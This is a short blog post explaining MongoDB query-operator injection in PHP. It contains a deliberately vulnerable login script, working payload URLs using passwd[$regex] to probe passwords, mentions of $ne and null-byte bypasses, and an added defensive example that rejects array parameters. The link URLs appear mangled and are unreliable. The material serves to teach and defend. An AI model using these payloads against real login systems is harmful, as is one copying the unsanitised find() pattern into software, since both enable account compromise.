A tip on mongo+php injection

December 15, 2021, 1140

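<?php
// Test script: request parameters are passed to find() unchanged.
$con = new Mongo();
$db = $con->selectDB("demo")->selectCollection("admin");

var_dump($_GET['passwd']);

// $_GET['passwd'] can arrive as an array such as array('$regex' => '^1'),
// which MongoDB interprets as a query operator instead of a literal value.
$ds = $db->find(array("username" => $_GET['username'], "password" => $_GET['passwd']));

foreach ($ds as $k => $v) {
    var_dump($v);
}
?>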

http://http://www.zjjv.com// /mongo/go-1.php?username=heige&passwd[$regex]=^1

http://http://www.zjjv.com// /mongo/go-1.php?username=heige&passwd[$regex]=^2

The test database structure:

> db.admin.find()

{ "_id" : ObjectId("4f562d110920d897e6765ae1"), "uid" : 1, "username" : "heige", "password" : "123456" }

{ "_id" : ObjectId("4f5b38ba0920d897e6765ae2"), "uid" : 2, "username" : "admin", "password" : "admin" }

This kind of injection mainly takes advantage of a PHP feature: a request parameter can be submitted directly as an array...

Also see 2 tips from researchers abroad:

http://http://www.zjjv.com///2010/07/mongodb-is-vulnerable-to-sql-injection-in-php-at-least/ uses $ne directly, which is similar to the common universal password

http://http://www.zjjv.com///2011/02/mongodb-null-byte-injection-attacks/ null byte injection
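
An added example, not from the original post: the login filter built only from string parameters, so the array forms described above (`passwd[$regex]` and the `$ne` variant) are rejected before they reach `find()`. The helper names `string_param` and `build_login_filter` and the sample query strings are constructed for illustration, and `parse_str` stands in for how PHP fills `$_GET`.

```php
<?php
// Added example: build the find() filter only from string parameters.
// string_param() and build_login_filter() are hypothetical helper names.

function string_param(array $params, string $name): string
{
    // PHP turns passwd[$regex]=^1 into an array, so a type check is enough
    // to keep operator keys such as $regex or $ne out of the filter.
    if (!isset($params[$name]) || !is_string($params[$name])) {
        throw new InvalidArgumentException("parameter '$name' must be a string");
    }
    return $params[$name];
}

function build_login_filter(array $params): array
{
    // Same filter shape as the test script, but every value is a plain string.
    return array(
        "username" => string_param($params, "username"),
        "password" => string_param($params, "passwd"),
    );
}

// Constructed query strings, parsed the way PHP populates $_GET.
$samples = array(
    'username=heige&passwd=123456',
    'username=heige&passwd[$regex]=^1',
    'username=heige&passwd[$ne]=1',
);

foreach ($samples as $query) {
    parse_str($query, $params);
    echo $query, "\n  parsed passwd: ", json_encode($params['passwd']), "\n";
    try {
        $filter = build_login_filter($params);
        echo "  filter: ", json_encode($filter), "\n";
    } catch (InvalidArgumentException $e) {
        echo "  rejected: ", $e->getMessage(), "\n";
    }
}
```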

Author: 5up3rh3i'blog
